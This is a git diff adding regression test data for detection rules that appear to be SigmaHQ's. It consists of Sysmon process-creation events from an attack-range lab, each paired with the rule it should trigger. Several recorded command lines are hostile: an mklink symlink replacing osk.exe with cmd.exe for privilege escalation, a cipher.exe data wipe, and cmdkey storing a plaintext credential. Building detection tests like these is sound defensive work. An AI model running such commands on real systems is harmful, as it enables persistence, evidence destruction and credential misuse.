"System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:28:28.958645Z" + } + }, + "EventRecordID": 11905446, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:28:28.957", + "ProcessGuid": "5AA13A44-08BC-68FD-2336-000000004002", + "ProcessId": 8208, + "Image": "C:\\Windows\\System32\\chcp.com", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Change CodePage Utility", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CHCP.COM", + "CommandLine": "chcp 936", + "CurrentDirectory": "C:\\Users\\Administrator\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=0489A9D0B4342F9C87C03510E0073898864946A5,MD5=0714C0100E008D00EC82E7B549595F69,SHA256=A807B535F7176642FC87911D185C10B00981388CDA68F5B8E2FF4C73FF514352,IMPHASH=75FA51C548B19C4AD5051FAB7D57EB56", + "ParentProcessGuid": "5AA13A44-08B2-68FD-2136-000000004002", + "ParentProcessId": 3204, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/info.yml b/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/info.yml new file mode 100644 index 000000000..20c85ba02 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/info.yml @@ -0,0 +1,13 @@ +id: a67c0d0c-3b40-4fef-a39d-5bd528255d90 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: c7942406-33dd-4377-a564-0f62db0593a3 + title: Suspicious CodePage Switch Via CHCP +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/c7942406-33dd-4377-a564-0f62db0593a3.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/4b046706-5789-4673-b111-66f25fe99534.evtx b/regression_data/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/4b046706-5789-4673-b111-66f25fe99534.evtx new file mode 100644 index 000000000..a7dd2dc9b Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/4b046706-5789-4673-b111-66f25fe99534.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/4b046706-5789-4673-b111-66f25fe99534.json b/regression_data/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/4b046706-5789-4673-b111-66f25fe99534.json new file mode 100644 index 000000000..a8b35b385 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/4b046706-5789-4673-b111-66f25fe99534.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:32:06.432272Z" + } + }, + "EventRecordID": 11973062, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:32:06.421", + "ProcessGuid": "5AA13A44-0996-68FD-3A36-000000004002", + "ProcessId": 2876, + "Image": "C:\\Windows\\System32\\cipher.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "File Encryption Utility", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CIPHER.EXE", + "CommandLine": "cipher.exe /w:C:", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=5747F6E48C899AEE54E4153AC8A8B61E741F45E2,MD5=3D7D3EEDD055EFF0C7995491466A7EB7,SHA256=6E04AD8A79A7D794438E197606AB78B079929D941FE99DD5159702694F7ACE77,IMPHASH=E83B4C457AFD5EEA31874B00E8A3A956", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/info.yml b/regression_data/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/info.yml new file mode 100644 index 000000000..a9f91c9f8 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/info.yml @@ -0,0 +1,13 @@ +id: 18b75b44-f2a5-497f-934c-9d0941f57f0f +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 4b046706-5789-4673-b111-66f25fe99534 + title: Deleted Data Overwritten Via Cipher.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/4b046706-5789-4673-b111-66f25fe99534.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_clip_execution/ddeff553-5233-4ae9-bbab-d64d2bd634be.evtx b/regression_data/windows/process_creation/proc_creation_win_clip_execution/ddeff553-5233-4ae9-bbab-d64d2bd634be.evtx new file mode 100644 index 000000000..5ef9a365c Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_clip_execution/ddeff553-5233-4ae9-bbab-d64d2bd634be.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_clip_execution/ddeff553-5233-4ae9-bbab-d64d2bd634be.json b/regression_data/windows/process_creation/proc_creation_win_clip_execution/ddeff553-5233-4ae9-bbab-d64d2bd634be.json new file mode 100644 index 000000000..fdf5019a2 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_clip_execution/ddeff553-5233-4ae9-bbab-d64d2bd634be.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:33:00.990279Z" + } + }, + "EventRecordID": 11989935, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:33:00.989", + "ProcessGuid": "5AA13A44-09CC-68FD-4336-000000004002", + "ProcessId": 1060, + "Image": "C:\\Windows\\System32\\clip.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Clip - copies the data into clipboard", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "clip.exe", + "CommandLine": "clip", + "CurrentDirectory": "C:\\Users\\Administrator\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=F3F4BE6C6A42072CBB74D05E3EBE285FB24C56CF,MD5=61C8E9DEC5E3AEA798C2862CD4565CCA,SHA256=ABAF131EA0A608072574D7C77A6EE5175CA13E361DE18146A54A78CBD868BFF3,IMPHASH=FFEDF33A1AF6412E26F1F659C12D5FF7", + "ParentProcessGuid": "5AA13A44-08B2-68FD-2136-000000004002", + "ParentProcessId": 3204, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_clip_execution/info.yml b/regression_data/windows/process_creation/proc_creation_win_clip_execution/info.yml new file mode 100644 index 000000000..7d1d79487 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_clip_execution/info.yml @@ -0,0 +1,13 @@ +id: 4ea9d42e-437f-4c56-8173-bdd8cafd72be +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: ddeff553-5233-4ae9-bbab-d64d2bd634be + title: Data Copied To Clipboard Via Clip.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_clip_execution/ddeff553-5233-4ae9-bbab-d64d2bd634be.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.evtx b/regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.evtx new file mode 100644 index 000000000..df8accd0d Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.json b/regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.json new file mode 100644 index 000000000..f1b1d7319 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:04:38.507492Z" + } + }, + "EventRecordID": 8302863, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:04:38.497", + "ProcessGuid": "5AA13A44-CAE6-68FC-A62F-000000004002", + "ProcessId": 7816, + "Image": "C:\\Windows\\System32\\cmd.exe", + "FileVersion": "10.0.20348.3932 (WinBuild.160101.0800)", + "Description": "Windows Command Processor", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "Cmd.Exe", + "CommandLine": "cmd /c assoc", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/info.yml b/regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/info.yml new file mode 100644 index 000000000..ce83d82c8 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/info.yml @@ -0,0 +1,13 @@ +id: 1a0606d6-3470-45e5-aeea-16098357e709 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 3d3aa6cd-6272-44d6-8afc-7e88dfef7061 + title: Change Default File Association Via Assoc +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_dir_execution/7c9340a9-e2ee-4e43-94c5-c54ebbea1006.evtx b/regression_data/windows/process_creation/proc_creation_win_cmd_dir_execution/7c9340a9-e2ee-4e43-94c5-c54ebbea1006.evtx new file mode 100644 index 000000000..e3402971f Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_cmd_dir_execution/7c9340a9-e2ee-4e43-94c5-c54ebbea1006.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_dir_execution/7c9340a9-e2ee-4e43-94c5-c54ebbea1006.json b/regression_data/windows/process_creation/proc_creation_win_cmd_dir_execution/7c9340a9-e2ee-4e43-94c5-c54ebbea1006.json new file mode 100644 index 000000000..4dec20564 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_cmd_dir_execution/7c9340a9-e2ee-4e43-94c5-c54ebbea1006.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:13:54.628884Z" + } + }, + "EventRecordID": 8447015, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:13:54.622", + "ProcessGuid": "5AA13A44-CD12-68FC-E62F-000000004002", + "ProcessId": 9088, + "Image": "C:\\Windows\\System32\\cmd.exe", + "FileVersion": "10.0.20348.3932 (WinBuild.160101.0800)", + "Description": "Windows Command Processor", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "Cmd.Exe", + "CommandLine": "cmd /c \"dir /s\"", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_dir_execution/info.yml b/regression_data/windows/process_creation/proc_creation_win_cmd_dir_execution/info.yml new file mode 100644 index 000000000..dc134520f --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_cmd_dir_execution/info.yml @@ -0,0 +1,13 @@ +id: 952d9279-9d38-4dc6-b32e-4b470cf99fc7 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 7c9340a9-e2ee-4e43-94c5-c54ebbea1006 + title: File And SubFolder Enumeration Via Dir Command +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_cmd_dir_execution/7c9340a9-e2ee-4e43-94c5-c54ebbea1006.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/e9b61244-893f-427c-b287-3e708f321c6b.evtx b/regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/e9b61244-893f-427c-b287-3e708f321c6b.evtx new file mode 100644 index 000000000..23395b22d Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/e9b61244-893f-427c-b287-3e708f321c6b.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/e9b61244-893f-427c-b287-3e708f321c6b.json b/regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/e9b61244-893f-427c-b287-3e708f321c6b.json new file mode 100644 index 000000000..7e984c958 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/e9b61244-893f-427c-b287-3e708f321c6b.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:15:18.885132Z" + } + }, + "EventRecordID": 8471746, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:15:18.879", + "ProcessGuid": "5AA13A44-CD66-68FC-F12F-000000004002", + "ProcessId": 8620, + "Image": "C:\\Windows\\System32\\cmd.exe", + "FileVersion": "10.0.20348.3932 (WinBuild.160101.0800)", + "Description": "Windows Command Processor", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "Cmd.Exe", + "CommandLine": "cmd /c \"mklink C:\\Windows\\System32\\osk.exe C:\\Windows\\System32\\cmd.exe\"", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/info.yml b/regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/info.yml new file mode 100644 index 000000000..faafff6e7 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/info.yml @@ -0,0 +1,13 @@ +id: 20e20ac5-43f2-40a3-811c-53466d1be222 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: e9b61244-893f-427c-b287-3e708f321c6b + title: Potential Privilege Escalation Using Symlink Between Osk and Cmd +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/e9b61244-893f-427c-b287-3e708f321c6b.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.evtx b/regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.evtx new file mode 100644 index 000000000..6acc866af Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.json b/regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.json new file mode 100644 index 000000000..688d20394 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:16:49.968129Z" + } + }, + "EventRecordID": 8498306, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:16:49.961", + "ProcessGuid": "5AA13A44-CDC1-68FC-F82F-000000004002", + "ProcessId": 608, + "Image": "C:\\Windows\\System32\\cmd.exe", + "FileVersion": "10.0.20348.3932 (WinBuild.160101.0800)", + "Description": "Windows Command Processor", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "Cmd.Exe", + "CommandLine": "cmd /c \"rmdir /s /q malware_folder\"", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/info.yml b/regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/info.yml new file mode 100644 index 000000000..b700d79bf --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/info.yml @@ -0,0 +1,13 @@ +id: 20a05730-38e8-4889-ab29-0723f185deb0 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 41ca393d-538c-408a-ac27-cf1e038be80c + title: Directory Removal Via Rmdir +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.evtx b/regression_data/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.evtx new file mode 100644 index 000000000..1269de85a Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.json b/regression_data/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.json new file mode 100644 index 000000000..89edb80bb --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:20:36.737647Z" + } + }, + "EventRecordID": 8565164, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:20:36.729", + "ProcessGuid": "5AA13A44-CEA4-68FC-1330-000000004002", + "ProcessId": 4944, + "Image": "C:\\Windows\\System32\\cmdkey.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Credential Manager Command Line Utility", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "cmdkey.exe", + "CommandLine": "\"C:\\Windows\\system32\\cmdkey.exe\" /generic:TERMSRV/AR-WIN-DC /user:ATTACKRANGE\\Administrator /pass:1password2!", + "CurrentDirectory": "C:\\tools\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=138CCC1346F17921DC1DF71C88F472ACCC24BC5F,MD5=8B20EBCF5A2C5410B43765B5CEA17E5B,SHA256=F71C08CB7630990EE46338937897C0A83C96DFB8F37DB70322CE7417C01157AA,IMPHASH=03AD7A1AF78BF7A500FB199CABE4C34A", + "ParentProcessGuid": "5AA13A44-0BE6-68FC-A61D-000000004002", + "ParentProcessId": 10004, + "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "ParentCommandLine": "powershell -noprofile", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/info.yml b/regression_data/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/info.yml new file mode 100644 index 000000000..5139d0a67 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/info.yml @@ -0,0 +1,13 @@ +id: 56a1d988-b883-41dc-ba91-6077c43189df +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: b1ec66c6-f4d1-4b5c-96dd-af28ccae7727 + title: New Generic Credentials Added Via Cmdkey.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: 